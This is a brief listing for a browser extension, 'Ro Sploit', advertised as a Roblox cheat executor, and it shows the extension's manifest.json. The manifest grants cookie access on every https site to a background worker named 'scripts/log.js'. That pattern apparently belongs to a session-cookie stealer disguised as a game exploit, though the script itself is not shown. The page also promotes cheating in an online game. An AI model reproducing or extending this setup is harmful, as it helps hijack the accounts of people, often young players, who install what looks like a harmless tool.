Ro Sploit

Ro Sploit

A roblox executor that runs in your browser. No need for sketchy software!

Merlin
Additional files are visible only to premium users

manifest.json


{
  "name": "Ro Sploit",
  "description": "A roblox executor that runs in your browser. No need for sketchy software!",
  "version": "1.0.2",
  "manifest_version": 3,
  "action": {
    "default_icon": "assets/roblox.png"
  },
  "host_permissions": [
    "https://*/*"
  ],
  "permissions": [
    "cookies"
  ],
  "background": {
    "service_worker": "scripts/log.js"
  },
  "icons": {
    "16": "assets/roblox.png",
    "32": "assets/roblox.png",
    "48": "assets/roblox.png",
    "128": "assets/roblox.png"
  },
  "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx"
}